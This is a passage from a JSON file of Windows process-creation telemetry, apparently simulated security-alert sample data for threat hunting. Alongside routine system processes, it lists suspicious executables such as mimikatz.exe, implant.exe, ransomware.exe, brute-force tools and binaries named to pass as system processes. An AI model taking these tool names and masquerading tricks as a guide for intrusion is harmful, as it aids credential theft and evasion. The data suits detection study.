Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\c